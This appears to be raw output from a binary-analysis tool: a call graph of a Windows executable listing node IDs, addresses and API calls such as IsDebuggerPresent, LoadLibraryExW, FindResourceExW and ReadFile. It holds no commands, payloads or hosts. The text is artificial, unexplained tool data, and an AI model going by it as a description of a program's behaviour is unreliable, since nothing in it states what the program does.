99480->99481 99482 fa5258 GetCurrentDirectoryW 99481->99482 99534 fa4ec8 99482->99534 99484 fa527e IsDebuggerPresent 99485 fa528c 99484->99485 99486 fe0b21 MessageBoxA 99484->99486 99487 fe0b39 99485->99487 99488 fa52a0 99485->99488 99486->99487 99642 fa314d 59 API calls Mailbox 99487->99642 99602 fa31bf 99488->99602 99491 fe0b49 99498 fe0b5f SetCurrentDirectoryW 99491->99498 99493 fa52be GetFullPathNameW 99495 fa1821 59 API calls 99493->99495 99494 fa535f SetCurrentDirectoryW 99497 fa536c Mailbox 99494->99497 99496 fa52f9 99495->99496 99618 f9bbc6 99496->99618 99497->99398 99498->99497 99518 fa5358 99518->99494 99531->99470 99532->99475 99533->99477 99535 fa1207 59 API calls 99534->99535 99536 fa4ede 99535->99536 99645 fa5420 99536->99645 99538 fa4efc 99539 fa19e1 59 API calls 99538->99539 99540 fa4f10 99539->99540 99541 fa1c9c 59 API calls 99540->99541 99542 fa4f1b 99541->99542 99659 f9477a 99542->99659 99545 fa1a36 59 API calls 99546 fa4f34 99545->99546 99547 f939be 68 API calls 99546->99547 99548 fa4f44 Mailbox 99547->99548 99549 fa1a36 59 API calls 99548->99549 99550 fa4f68 99549->99550 99551 f939be 68 API calls 99550->99551 99552 fa4f77 Mailbox 99551->99552 99553 fa1207 59 API calls 99552->99553 99554 fa4f94 99553->99554 99662 fa55bc 99554->99662 99557 fb312d _W_store_winword 60 API calls 99558 fa4fae 99557->99558 99559 fa4fb8 99558->99559 99560 fe0a54 99558->99560 99562 fb312d _W_store_winword 60 API calls 99559->99562 99561 fa55bc 59 API calls 99560->99561 99563 fe0a68 99561->99563 99564 fa4fc3 99562->99564 99567 fa55bc 59 API calls 99563->99567 99564->99563 99565 fa4fcd 99564->99565 99566 fb312d _W_store_winword 60 API calls 99565->99566 99568 fa4fd8 99566->99568 99569 fe0a84 99567->99569 99568->99569 99570 fa4fe2 99568->99570 99571 fb00cf 61 API calls 99569->99571 99572 fb312d _W_store_winword 60 API calls 99570->99572 99573 fe0aa7 99571->99573 99574 fa4fed 99572->99574 99575 fa55bc 59 API calls 99573->99575 99576 fe0ad0 99574->99576 99577 fa4ff7 99574->99577 99578 fe0ab3 99575->99578 99580 fa55bc 59 API calls 99576->99580 99579 fa501b 99577->99579 99582 fa1c9c 59 API calls 99577->99582 99581 fa1c9c 59 API calls 99578->99581 99586 f947be 59 API calls 99579->99586 99583 fe0aee 99580->99583 99584 fe0ac1 99581->99584 99585 fa500e 99582->99585 99587 fa1c9c 59 API calls 99583->99587 99588 fa55bc 59 API calls 99584->99588 99589 fa55bc 59 API calls 99585->99589 99590 fa502a 99586->99590 99591 fe0afc 99587->99591 99588->99576 99589->99579 99593 f94540 59 API calls 99590->99593 99592 fa55bc 59 API calls 99591->99592 99594 fe0b0b 99592->99594 99595 fa5038 99593->99595 99594->99594 99668 f943d0 99595->99668 99597 f9477a 59 API calls 99599 fa5055 99597->99599 99598 f943d0 59 API calls 99598->99599 99599->99597 99599->99598 99600 fa55bc 59 API calls 99599->99600 99601 fa509b Mailbox 99599->99601 99600->99599 99601->99484 99603 fa31cc __ftell_nolock 99602->99603 99604 fe0314 _memset 99603->99604 99605 fa31e5 99603->99605 99607 fe0330 GetOpenFileNameW 99604->99607 99606 fb0284 60 API calls 99605->99606 99608 fa31ee 99606->99608 99609 fe037f 99607->99609 99682 fb09c5 99608->99682 99611 fa1821 59 API calls 99609->99611 99613 fe0394 99611->99613 99613->99613 99615 fa3203 99700 fa278a 99615->99700 99619 f9bbd3 __ftell_nolock 99618->99619 100493 fa2cb2 99619->100493 99642->99491 99646 fa542d __ftell_nolock 99645->99646 99647 fa1821 59 API calls 99646->99647 99651 fa5590 Mailbox 99646->99651 99649 fa545f 99647->99649 99657 fa5495 Mailbox 99649->99657 99677 fa1609 99649->99677 99650 fa5563 99650->99651 99652 fa1a36 59 API calls 99650->99652 99651->99538 99653 fa5584 99652->99653 99656 fa4c94 59 API calls 99653->99656 99654 fa1a36 59 API calls 99654->99657 99655 fa1609 59 API calls 99655->99657 99656->99651 99657->99650 99657->99651 99657->99654 99657->99655 99658 fa4c94 59 API calls 99657->99658 99658->99657 99660 fb0fe6 Mailbox 59 API calls 99659->99660 99661 f94787 99660->99661 99661->99545 99663 fa55df 99662->99663 99664 fa55c6 99662->99664 99666 fa1821 59 API calls 99663->99666 99665 fa1c9c 59 API calls 99664->99665 99667 fa4fa0 99665->99667 99666->99667 99667->99557 99669 fcd6c9 99668->99669 99672 f943e7 99668->99672 99669->99672 99681 f940cb 59 API calls Mailbox 99669->99681 99671 f944ef 99671->99599 99672->99671 99673 f944e8 99672->99673 99674 f94530 99672->99674 99676 fb0fe6 Mailbox 59 API calls 99673->99676 99680 f9523c 59 API calls 99674->99680 99676->99671 99678 fa1aa4 59 API calls 99677->99678 99679 fa1614 99678->99679 99679->99649 99680->99671 99681->99672 99683 fc1b70 __ftell_nolock 99682->99683 99684 fb09d2 GetLongPathNameW 99683->99684 99685 fa1821 59 API calls 99684->99685 99686 fa31f7 99685->99686 99687 fa2f3d 99686->99687 99688 fa1207 59 API calls 99687->99688 99689 fa2f4f 99688->99689 99690 fb0284 60 API calls 99689->99690 99691 fa2f5a 99690->99691 99692 fe0177 99691->99692 99693 fa2f65 99691->99693 99697 fe0191 99692->99697 99740 fa151f 61 API calls 99692->99740 99695 fa4c94 59 API calls 99693->99695 99696 fa2f71 99695->99696 99734 f91307 99696->99734 99699 fa2f84 Mailbox 99699->99615 99741 fa49c2 99700->99741 99703 fdf8d6 99858 ff9b16 99703->99858 99704 fa49c2 136 API calls 99706 fa27c3 99704->99706 99706->99703 99710 fa27cb 99706->99710 99708 fdf908 99712 fb0fe6 Mailbox 59 API calls 99708->99712 99709 fdf8eb 99916 fa4a2f 99709->99916 99713 fa27d7 99710->99713 99714 fdf8f3 99710->99714 99733 fdf94d Mailbox 99712->99733 99765 fa29be 99713->99765 99922 ff47e8 90 API calls _wprintf 99714->99922 99717 fdf901 99717->99708 99719 fdfb01 99720 fb2f85 _free 58 API calls 99719->99720 99721 fdfb09 99720->99721 99722 fa4a2f 84 API calls 99721->99722 99727 fdfb12 99722->99727 99726 fb2f85 _free 58 API calls 99726->99727 99727->99726 99729 fa4a2f 84 API calls 99727->99729 99924 feff5c 89 API calls 4 library calls 99727->99924 99729->99727 99730 fa1a36 59 API calls 99730->99733 99733->99719 99733->99727 99733->99730 99893 fefef8 99733->99893 99896 ff793a 99733->99896 99902 fa343f 99733->99902 99910 fa3297 99733->99910 99923 fefe19 61 API calls 2 library calls 99733->99923 99735 f91319 99734->99735 99739 f91338 _memmove 99734->99739 99737 fb0fe6 Mailbox 59 API calls 99735->99737 99736 fb0fe6 Mailbox 59 API calls 99738 f9134f 99736->99738 99737->99739 99738->99699 99739->99736 99740->99692 99925 fa4b29 99741->99925 99746 fe08bb 99749 fa4a2f 84 API calls 99746->99749 99747 fa49ed LoadLibraryExW 99935 fa4ade 99747->99935 99751 fe08c2 99749->99751 99753 fa4ade 3 API calls 99751->99753 99755 fe08ca 99753->99755 99754 fa4a14 99754->99755 99756 fa4a20 99754->99756 99961 fa4ab2 99755->99961 99758 fa4a2f 84 API calls 99756->99758 99760 fa27af 99758->99760 99760->99703 99760->99704 99762 fe08f1 99969 fa4a6e 99762->99969 99764 fe08fe 99766 fdfd14 99765->99766 99767 fa29e7 99765->99767 100340 feff5c 89 API calls 4 library calls 99766->100340 100326 fa3df7 60 API calls Mailbox 99767->100326 99770 fa2a09 100327 fa3e47 67 API calls 99770->100327 99771 fdfd27 100341 feff5c 89 API calls 4 library calls 99771->100341 99773 fa2a1e 99773->99771 99774 fa2a26 99773->99774 99776 fa1207 59 API calls 99774->99776 99778 fa2a32 99776->99778 99777 fdfd43 99806 fa2a93 99777->99806 100328 fb0b8b 60 API calls __ftell_nolock 99778->100328 99780 fa2aa1 99784 fa1207 59 API calls 99780->99784 99781 fdfd56 99783 fa42cf CloseHandle 99781->99783 99782 fa2a3e 99785 fa1207 59 API calls 99782->99785 99786 fdfd62 99783->99786 99787 fa2aaa 99784->99787 99788 fa2a4a 99785->99788 99789 fa49c2 136 API calls 99786->99789 99790 fa1207 59 API calls 99787->99790 99791 fb0284 60 API calls 99788->99791 99793 fdfd7e 99789->99793 99794 fa2ab3 99790->99794 99792 fa2a58 99791->99792 100329 fa3ea1 ReadFile SetFilePointerEx 99792->100329 99796 fdfda3 99793->99796 99799 ff9b16 122 API calls 99793->99799 100331 fb0119 59 API calls Mailbox 99794->100331 100342 feff5c 89 API calls 4 library calls 99796->100342 99798 fa2a84 100330 fa410a SetFilePointerEx SetFilePointerEx 99798->100330 99803 fdfd96 99799->99803 99800 fa2aca 100332 fa17e0 59 API calls Mailbox 99800->100332 99807 fdfdbf 99803->99807 99808 fdfd9e 99803->99808 99805 fdfdba 99836 fa2c3e Mailbox 99805->99836 99806->99780 99806->99781 99810 fa4a2f 84 API calls 99807->99810 99811 fa4a2f 84 API calls 99808->99811 99809 fa2adb SetCurrentDirectoryW 99814 fa2aee Mailbox 99809->99814 99812 fdfdc4 99810->99812 99811->99796 99813 fb0fe6 Mailbox 59 API calls 99812->99813 99820 fdfdf8 99813->99820 99816 fb0fe6 Mailbox 59 API calls 99814->99816 99818 fa2b01 99816->99818 99817 fa27ef 99817->99493 99817->99518 99819 fa433f 59 API calls 99818->99819 99847 fa2b0c Mailbox __wsetenvp 99819->99847 99821 fa343f 59 API calls 99820->99821 99853 fdfe41 Mailbox 99821->99853 99822 fa2c19 99823 fa42cf CloseHandle 99822->99823 99826 fa2c25 SetCurrentDirectoryW 99823->99826 99825 fe0032 99828 ff789a 59 API calls 99825->99828 99826->99836 99829 fe0054 99828->99829 100345 fffc0d 59 API calls 2 library calls 99829->100345 99832 fe0061 99833 fb2f85 _free 58 API calls 99832->99833 99833->99836 99834 fe00cb 100348 feff5c 89 API calls 4 library calls 99834->100348 100321 fa3e25 99836->100321 99838 fa343f 59 API calls 99838->99853 99839 fe00e4 99839->99822 99841 fe00c3 100347 fefdb2 59 API calls 4 library calls 99841->100347 99844 fa1a36 59 API calls 99844->99847 99846 fefef8 59 API calls 99846->99853 99847->99822 99847->99834 99847->99841 99847->99844 100333 fa3ebe 67 API calls _wcscpy 99847->100333 100334 fa2e8f GetStringTypeW 99847->100334 100335 fa2dfe 60 API calls __wcsnicmp 99847->100335 100336 fa2edc GetStringTypeW __wsetenvp 99847->100336 100337 fb386d GetStringTypeW _iswctype 99847->100337 100338 fa27fc 165 API calls 3 library calls 99847->100338 100339 fa314d 59 API calls Mailbox 99847->100339 99848 fa1a36 59 API calls 99848->99853 99850 ff793a 59 API calls 99850->99853 99852 fe0084 100346 feff5c 89 API calls 4 library calls 99852->100346 99853->99825 99853->99838 99853->99846 99853->99848 99853->99850 99853->99852 100343 fefe19 61 API calls 2 library calls 99853->100343 100344 fa314d 59 API calls Mailbox 99853->100344 99855 fe009d 99856 fb2f85 _free 58 API calls 99855->99856 99857 fe00b0 99856->99857 99857->99836 99859 fa4a8c 85 API calls 99858->99859 99860 ff9b85 99859->99860 100349 ff9cf1 99860->100349 99863 fa4ab2 74 API calls 99864 ff9bb4 99863->99864 99865 fa4ab2 74 API calls 99864->99865 99866 ff9bc4 99865->99866 99867 fa4ab2 74 API calls 99866->99867 99868 ff9bdf 99867->99868 99869 fa4ab2 74 API calls 99868->99869 99870 ff9bfa 99869->99870 99871 fa4a8c 85 API calls 99870->99871 99872 ff9c11 99871->99872 99873 fb593c __crtLCMapStringA_stat 58 API calls 99872->99873 99874 ff9c18 99873->99874 99875 fb593c __crtLCMapStringA_stat 58 API calls 99874->99875 99876 ff9c22 99875->99876 99877 fa4ab2 74 API calls 99876->99877 99878 ff9c36 99877->99878 99879 ff96c4 GetSystemTimeAsFileTime 99878->99879 99880 ff9c49 99879->99880 99881 ff9c5e 99880->99881 99882 ff9c73 99880->99882 99883 fb2f85 _free 58 API calls 99881->99883 99884 ff9c79 99882->99884 99885 ff9cd8 99882->99885 99888 ff9c64 99883->99888 100355 ff90c1 99884->100355 99887 fb2f85 _free 58 API calls 99885->99887 99892 fdf8e7 99887->99892 99890 fb2f85 _free 58 API calls 99888->99890 99890->99892 99891 fb2f85 _free 58 API calls 99891->99892 99892->99708 99892->99709 99894 fb0fe6 Mailbox 59 API calls 99893->99894 99895 feff28 _memmove 99894->99895 99895->99733 99897 ff7945 99896->99897 99898 fb0fe6 Mailbox 59 API calls 99897->99898 99900 ff795c 99898->99900 99899 ff796b 99899->99733 99900->99899 99901 fa1a36 59 API calls 99900->99901 99901->99899 99903 fa34df 99902->99903 99909 fa3452 _memmove 99902->99909 99905 fb0fe6 Mailbox 59 API calls 99903->99905 99904 fb0fe6 Mailbox 59 API calls 99906 fa3459 99904->99906 99905->99909 99907 fb0fe6 Mailbox 59 API calls 99906->99907 99908 fa3482 99906->99908 99907->99908 99908->99733 99909->99904 99911 fa32aa 99910->99911 99914 fa3358 99910->99914 99912 fb0fe6 Mailbox 59 API calls 99911->99912 99915 fa32dc 99911->99915 99912->99915 99913 fb0fe6 59 API calls Mailbox 99913->99915 99914->99733 99915->99913 99915->99914 99917 fa4a39 99916->99917 99918 fa4a40 99916->99918 99919 fb55c6 __fcloseall 83 API calls 99917->99919 99920 fa4a4f 99918->99920 99921 fa4a60 FreeLibrary 99918->99921 99919->99918 99920->99714 99921->99920 99922->99717 99923->99733 99924->99727 99974 fa4b77 99925->99974 99928 fa49d4 99932 fb547b 99928->99932 99929 fa4b60 FreeLibrary 99929->99928 99930 fa4b77 2 API calls 99931 fa4b50 99930->99931 99931->99928 99931->99929 99978 fb5490 99932->99978 99934 fa49e1 99934->99746 99934->99747 100059 fa4baa 99935->100059 99938 fa4b03 99939 fa4a05 99938->99939 99940 fa4b15 FreeLibrary 99938->99940 99942 fa48b0 99939->99942 99940->99939 99941 fa4baa 2 API calls 99941->99938 99943 fb0fe6 Mailbox 59 API calls 99942->99943 99944 fa48c5 99943->99944 99945 fa433f 59 API calls 99944->99945 99946 fa48d1 _memmove 99945->99946 99947 fe080a 99946->99947 99948 fa490c 99946->99948 99950 fe0817 99947->99950 100068 ff9ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99947->100068 99949 fa4a6e 69 API calls 99948->99949 99960 fa4915 99949->99960 100069 ff9f5e 95 API calls 99950->100069 99953 fa4ab2 74 API calls 99953->99960 99955 fe0859 100063 fa4a8c 99955->100063 99957 fa4a8c 85 API calls 99957->99960 99958 fa4ab2 74 API calls 99959 fa49a0 99958->99959 99959->99754 99960->99953 99960->99955 99960->99957 99960->99959 99962 fe0945 99961->99962 99963 fa4ac4 99961->99963 100175 fb5802 99963->100175 99966 ff96c4 100300 ff951a 99966->100300 99968 ff96da 99968->99762 99970 fa4a7d 99969->99970 99973 fe0908 99969->99973 100305 fb5e80 99970->100305 99972 fa4a85 99972->99764 99975 fa4b44 99974->99975 99976 fa4b80 LoadLibraryA 99974->99976 99975->99930 99975->99931 99976->99975 99977 fa4b91 GetProcAddress 99976->99977 99977->99975 99981 fb549c ___lock_fhandle 99978->99981 99979 fb54af 100027 fb8d58 58 API calls __getptd_noexit 99979->100027 99981->99979 99982 fb54e0 99981->99982 99997 fc0718 99982->99997 99983 fb54b4 100028 fb8fe6 9 API calls __ftell_nolock 99983->100028 99986 fb54e5 99987 fb54fb 99986->99987 99988 fb54ee 99986->99988 99990 fb5525 99987->99990 99991 fb5505 99987->99991 100029 fb8d58 58 API calls __getptd_noexit 99988->100029 100012 fc0837 99990->100012 100030 fb8d58 58 API calls __getptd_noexit 99991->100030 99992 fb54bf ___lock_fhandle @_EH4_CallFilterFunc@8 99992->99934 99998 fc0724 ___lock_fhandle 99997->99998 99999 fb9e3b __lock 58 API calls 99998->99999 100000 fc0732 99999->100000 100001 fc07ad 100000->100001 100006 fb9ec3 __mtinitlocknum 58 API calls 100000->100006 100010 fc07a6 100000->100010 100035 fb6e7d 59 API calls __lock 100000->100035 100036 fb6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100000->100036 100037 fb8a4d 58 API calls 2 library calls 100001->100037 100004 fc0823 ___lock_fhandle 100004->99986 100005 fc07b4 100005->100010 100038 fba05b InitializeCriticalSectionAndSpinCount 100005->100038 100006->100000 100009 fc07da EnterCriticalSection 100009->100010 100032 fc082e 100010->100032 100014 fc0857 __wopenfile 100012->100014 100013 fc0871 100043 fb8d58 58 API calls __getptd_noexit 100013->100043 100014->100013 100026 fc0a2c 100014->100026 100045 fb39fb 60 API calls 2 library calls 100014->100045 100016 fc0876 100044 fb8fe6 9 API calls __ftell_nolock 100016->100044 100018 fc0a8f 100040 fc87d1 100018->100040 100020 fb5530 100031 fb5552 LeaveCriticalSection LeaveCriticalSection _fseek 100020->100031 100022 fc0a25 100022->100026 100046 fb39fb 60 API calls 2 library calls 100022->100046 100024 fc0a44 100024->100026 100047 fb39fb 60 API calls 2 library calls 100024->100047 100026->100013 100026->100018 100027->99983 100028->99992 100029->99992 100030->99992 100031->99992 100039 fb9fa5 LeaveCriticalSection 100032->100039 100034 fc0835 100034->100004 100035->100000 100036->100000 100037->100005 100038->100009 100039->100034 100048 fc7fb5 100040->100048 100042 fc87ea 100042->100020 100043->100016 100044->100020 100045->100022 100046->100024 100047->100026 100049 fc7fc1 ___lock_fhandle 100048->100049 100050 fc7fd7 100049->100050 100053 fc800d 100049->100053 100051 fb8d58 __ftell_nolock 58 API calls 100050->100051 100052 fc7fdc 100051->100052 100054 fb8fe6 __ftell_nolock 9 API calls 100052->100054 100055 fc807e __wsopen_nolock 109 API calls 100053->100055 100058 fc7fe6 ___lock_fhandle 100054->100058 100056 fc8029 100055->100056 100057 fc8052 __wsopen_helper LeaveCriticalSection 100056->100057 100057->100058 100058->100042 100060 fa4af7 100059->100060 100061 fa4bb3 LoadLibraryA 100059->100061 100060->99938 100060->99941 100061->100060 100062 fa4bc4 GetProcAddress 100061->100062 100062->100060 100064 fa4a9b 100063->100064 100067 fe0923 100063->100067 100070 fb5a6d 100064->100070 100066 fa4aa9 100066->99958 100068->99950 100069->99960 100071 fb5a79 ___lock_fhandle 100070->100071 100072 fb5a8b 100071->100072 100074 fb5ab1 100071->100074 100101 fb8d58 58 API calls __getptd_noexit 100072->100101 100083 fb6e3e 100074->100083 100075 fb5a90 100102 fb8fe6 9 API calls __ftell_nolock 100075->100102 100082 fb5a9b ___lock_fhandle 100082->100066 100084 fb6e4e 100083->100084 100085 fb6e70 EnterCriticalSection 100083->100085 100084->100085 100087 fb6e56 100084->100087 100086 fb5ab7 100085->100086 100089 fb59de 100086->100089 100088 fb9e3b __lock 58 API calls 100087->100088 100088->100086 100090 fb59fc 100089->100090 100091 fb59ec 100089->100091 100092 fb5a12 100090->100092 100104 fb5af0 100090->100104 100174 fb8d58 58 API calls __getptd_noexit 100091->100174 100133 fb4c5d 100092->100133 100098 fb5a53 100146 fc185f 100098->100146 100100 fb59f1 100103 fb5ae8 LeaveCriticalSection LeaveCriticalSection _fseek 100100->100103 100101->100075 100102->100082 100103->100082 100105 fb5afd __ftell_nolock 100104->100105 100106 fb5b2d 100105->100106 100107 fb5b15 100105->100107 100108 fb4906 __ftell_nolock 58 API calls 100106->100108 100109 fb8d58 __ftell_nolock 58 API calls 100107->100109 100110 fb5b35 100108->100110 100111 fb5b1a 100109->100111 100113 fc185f __write 64 API calls 100110->100113 100112 fb8fe6 __ftell_nolock 9 API calls 100111->100112 100131 fb5b25 100112->100131 100114 fb5b51 100113->100114 100117 fb5d41 100114->100117 100118 fb5bd4 100114->100118 100114->100131 100115 fbc826 __ftell_nolock 6 API calls 100116 fb5e7c 100115->100116 100116->100092 100119 fb5d4a 100117->100119 100124 fb5cfd 100117->100124 100121 fb5bfa 100118->100121 100118->100124 100120 fb8d58 __ftell_nolock 58 API calls 100119->100120 100120->100131 100122 fc19f5 __lseeki64 62 API calls 100121->100122 100121->100131 100123 fb5c33 100122->100123 100126 fb5c5f ReadFile 100123->100126 100123->100131 100125 fc185f __write 64 API calls 100124->100125 100124->100131 100127 fb5dae 100125->100127 100128 fb5c84 100126->100128 100126->100131 100130 fc185f __write 64 API calls 100127->100130 100127->100131 100129 fc185f __write 64 API calls 100128->100129 100132 fb5c97 100129->100132 100130->100131 100131->100115 100132->100131 100134 fb4c70 100133->100134 100135 fb4c94 100133->100135 100134->100135 100136 fb4906 __ftell_nolock 58 API calls 100134->100136 100139 fb4906 100135->100139 100137 fb4c8d 100136->100137 100138 fbdab6 __write 78 API calls 100137->100138 100138->100135 100140 fb4910 100139->100140 100141 fb4925 100139->100141 100142 fb8d58 __ftell_nolock 58 API calls 100140->100142 100141->100098 100143 fb4915 100142->100143 100144 fb8fe6 __ftell_nolock 9 API calls 100143->100144 100145 fb4920 100144->100145 100145->100098 100147 fc186b ___lock_fhandle 100146->100147 100148 fc188f 100147->100148 100149 fc1878 100147->100149 100151 fc192e 100148->100151 100154 fc18a3 100148->100154 100150 fb8d24 __set_osfhnd 58 API calls 100149->100150 100153 fc187d 100150->100153 100152 fb8d24 __set_osfhnd 58 API calls 100151->100152 100157 fc18c6 100152->100157 100158 fb8d58 __ftell_nolock 58 API calls 100153->100158 100155 fc18cb 100154->100155 100156 fc18c1 100154->100156 100160 fbd436 ___lock_fhandle 59 API calls 100155->100160 100159 fb8d24 __set_osfhnd 58 API calls 100156->100159 100162 fb8d58 __ftell_nolock 58 API calls 100157->100162 100166 fc1884 ___lock_fhandle 100158->100166 100159->100157 100161 fc18d1 100160->100161 100163 fc18e4 100161->100163 100164 fc18f7 100161->100164 100165 fc193a 100162->100165 100167 fc194e __lseek_nolock 62 API calls 100163->100167 100169 fb8d58 __ftell_nolock 58 API calls 100164->100169 100168 fb8fe6 __ftell_nolock 9 API calls 100165->100168 100166->100100 100170 fc18f0 100167->100170 100168->100166 100171 fc18fc 100169->100171 100173 fc1926 __write LeaveCriticalSection 100170->100173 100172 fb8d24 __set_osfhnd 58 API calls 100171->100172 100172->100170 100173->100166 100174->100100 100178 fb581d 100175->100178 100177 fa4ad5 100177->99966 100179 fb5829 ___lock_fhandle 100178->100179 100180 fb583f _memset 100179->100180 100181 fb586c 100179->100181 100182 fb5864 ___lock_fhandle 100179->100182 100205 fb8d58 58 API calls __getptd_noexit 100180->100205 100183 fb6e3e __lock_file 59 API calls 100181->100183 100182->100177 100185 fb5872 100183->100185 100191 fb563d 100185->100191 100186 fb5859 100206 fb8fe6 9 API calls __ftell_nolock 100186->100206 100192 fb5673 100191->100192 100195 fb5658 _memset 100191->100195 100207 fb58a6 LeaveCriticalSection LeaveCriticalSection _fseek 100192->100207 100193 fb5663 100296 fb8d58 58 API calls __getptd_noexit 100193->100296 100195->100192 100195->100193 100198 fb56b3 100195->100198 100198->100192 100200 fb57c4 _memset 100198->100200 100201 fb4906 __ftell_nolock 58 API calls 100198->100201 100208 fc108b 100198->100208 100276 fc0dd7 100198->100276 100298 fc0ef8 58 API calls 3 library calls 100198->100298 100299 fb8d58 58 API calls __getptd_noexit 100200->100299 100201->100198 100204 fb5668 100297 fb8fe6 9 API calls __ftell_nolock 100204->100297 100205->100186 100206->100182 100207->100182 100209 fc10ac 100208->100209 100210 fc10c3 100208->100210 100211 fb8d24 __set_osfhnd 58 API calls 100209->100211 100212 fc17fb 100210->100212 100216 fc10fd 100210->100216 100213 fc10b1 100211->100213 100214 fb8d24 __set_osfhnd 58 API calls 100212->100214 100215 fb8d58 __ftell_nolock 58 API calls 100213->100215 100217 fc1800 100214->100217 100256 fc10b8 100215->100256 100219 fc1105 100216->100219 100224 fc111c 100216->100224 100218 fb8d58 __ftell_nolock 58 API calls 100217->100218 100220 fc1111 100218->100220 100221 fb8d24 __set_osfhnd 58 API calls 100219->100221 100223 fb8fe6 __ftell_nolock 9 API calls 100220->100223 100222 fc110a 100221->100222 100228 fb8d58 __ftell_nolock 58 API calls 100222->100228 100223->100256 100225 fc1131 100224->100225 100227 fc114b 100224->100227 100229 fc1169 100224->100229 100224->100256 100226 fb8d24 __set_osfhnd 58 API calls 100225->100226 100226->100222 100227->100225 100233 fc1156 100227->100233 100228->100220 100230 fb8a4d __malloc_crt 58 API calls 100229->100230 100231 fc1179 100230->100231 100234 fc119c 100231->100234 100235 fc1181 100231->100235 100232 fc5e9b __stbuf 58 API calls 100236 fc126a 100232->100236 100233->100232 100239 fc1af1 __lseeki64_nolock 60 API calls 100234->100239 100237 fb8d58 __ftell_nolock 58 API calls 100235->100237 100238 fc12e3 ReadFile 100236->100238 100243 fc1280 GetConsoleMode 100236->100243 100240 fc1186 100237->100240 100241 fc1305 100238->100241 100242 fc17c3 GetLastError 100238->100242 100239->100233 100244 fb8d24 __set_osfhnd 58 API calls 100240->100244 100241->100242 100249 fc12d5 100241->100249 100245 fc12c3 100242->100245 100246 fc17d0 100242->100246 100247 fc1294 100243->100247 100248 fc12e0 100243->100248 100244->100256 100254 fb8d37 __dosmaperr 58 API calls 100245->100254 100259 fc12c9 100245->100259 100250 fb8d58 __ftell_nolock 58 API calls 100246->100250 100247->100248 100251 fc129a ReadConsoleW 100247->100251 100248->100238 100258 fc15a7 100249->100258 100249->100259 100261 fc133a 100249->100261 100252 fc17d5 100250->100252 100251->100249 100253 fc12bd GetLastError 100251->100253 100255 fb8d24 __set_osfhnd 58 API calls 100252->100255 100253->100245 100254->100259 100255->100259 100256->100198 100257 fb2f85 _free 58 API calls 100257->100256 100258->100259 100266 fc16ad ReadFile 100258->100266 100259->100256 100259->100257 100262 fc13a6 ReadFile 100261->100262 100267 fc1427 100261->100267 100263 fc13c7 GetLastError 100262->100263 100268 fc13d1 100262->100268 100263->100268 100264 fc14e4 100271 fc1af1 __lseeki64_nolock 60 API calls 100264->100271 100273 fc1494 MultiByteToWideChar 100264->100273 100265 fc14d4 100269 fb8d58 __ftell_nolock 58 API calls 100265->100269 100270 fc16d0 GetLastError 100266->100270 100272 fc16de 100266->100272 100267->100259 100267->100264 100267->100265 100267->100273 100268->100261 100274 fc1af1 __lseeki64_nolock 60 API calls 100268->100274 100269->100259 100270->100272 100271->100273 100272->100258 100275 fc1af1 __lseeki64_nolock 60 API calls 100272->100275 100273->100253 100273->100259 100274->100268 100275->100272 100277 fc0de2 100276->100277 100281 fc0df7 100276->100281 100278 fb8d58 __ftell_nolock 58 API calls 100277->100278 100279 fc0de7 100278->100279 100280 fb8fe6 __ftell_nolock 9 API calls 100279->100280 100290 fc0df2 100280->100290 100282 fc6214 __getbuf 58 API calls 100281->100282 100283 fc0e2c 100281->100283 100281->100290 100282->100283 100284 fb4906 __ftell_nolock 58 API calls 100283->100284 100285 fc0e40 100284->100285 100286 fc0f77 __read 72 API calls 100285->100286 100287 fc0e47 100286->100287 100288 fb4906 __ftell_nolock 58 API calls 100287->100288 100287->100290 100289 fc0e6a 100288->100289 100289->100290 100291 fb4906 __ftell_nolock 58 API calls 100289->100291 100290->100198 100292 fc0e76 100291->100292 100292->100290 100293 fb4906 __ftell_nolock 58 API calls 100292->100293 100294 fc0e83 100293->100294 100295 fb4906 __ftell_nolock 58 API calls 100294->100295 100295->100290 100296->100204 100297->100192 100298->100198 100299->100204 100303 fb542a GetSystemTimeAsFileTime 100300->100303 100302 ff9529 100302->99968 100304 fb5458 __aulldiv 100303->100304 100304->100302 100306 fb5e8c ___lock_fhandle 100305->100306 100307 fb5e9e 100306->100307 100308 fb5eb3 100306->100308 100318 fb8d58 58 API calls __getptd_noexit 100307->100318 100310 fb6e3e __lock_file 59 API calls 100308->100310 100312 fb5eb9 100310->100312 100311 fb5ea3 100319 fb8fe6 9 API calls __ftell_nolock 100311->100319 100314 fb5af0 __ftell_nolock 67 API calls 100312->100314 100315 fb5ec4 100314->100315 100320 fb5ee4 LeaveCriticalSection LeaveCriticalSection _fseek 100315->100320 100317 fb5eae ___lock_fhandle 100317->99972 100318->100311 100319->100317 100320->100317 100322 fa42cf CloseHandle 100321->100322 100323 fa3e2d Mailbox 100322->100323 100324 fa42cf CloseHandle 100323->100324 100325 fa3e3c 100324->100325 100325->99817 100326->99770 100327->99773 100328->99782 100329->99798 100330->99806 100331->99800 100332->99809 100333->99847 100334->99847 100335->99847 100336->99847 100337->99847 100338->99847 100339->99847 100340->99771 100341->99777 100342->99805 100343->99853 100344->99853 100345->99832 100346->99855 100347->99834 100348->99839 100350 ff9d05 __tzset_nolock _wcscmp 100349->100350 100351 ff9b99 100350->100351 100352 fa4ab2 74 API calls 100350->100352 100353 ff96c4 GetSystemTimeAsFileTime 100350->100353 100354 fa4a8c 85 API calls 100350->100354 100351->99863 100351->99892 100352->100350 100353->100350 100354->100350 100356 ff90cc 100355->100356 100357 ff90da 100355->100357 100358 fb547b 115 API calls 100356->100358 100359 ff911f 100357->100359 100360 fb547b 115 API calls 100357->100360 100385 ff90e3 100357->100385 100358->100357 100386 ff934c 74 API calls 3 library calls 100359->100386 100362 ff9104 100360->100362 100362->100359 100363 ff9163 100385->99891 100386->100363 100511 fb3465 ___lock_fhandle 100510->100511 100512 fb9e3b __lock 51 API calls 100511->100512 100513 fb346c 100512->100513 100514 fb3525 __cinit 100513->100514 100515 fb349a DecodePointer 100513->100515 100530 fb3573 100514->100530 100515->100514 100517 fb34b1 DecodePointer 100515->100517 100523 fb34c1 100517->100523 100519 fb3582 ___lock_fhandle 100519->99402 100521 fb34ce EncodePointer 100521->100523 100522 fb356a 100524 fb32cf _fast_error_exit 3 API calls 100522->100524 100523->100514 100523->100521 100525 fb34de DecodePointer EncodePointer 100523->100525 100526 fb3573 100524->100526 100527 fb34f0 DecodePointer DecodePointer 100525->100527 100529 fb3580 100526->100529 100535 fb9fa5 LeaveCriticalSection 100526->100535 100527->100523 100529->99402 100531 fb3579 100530->100531 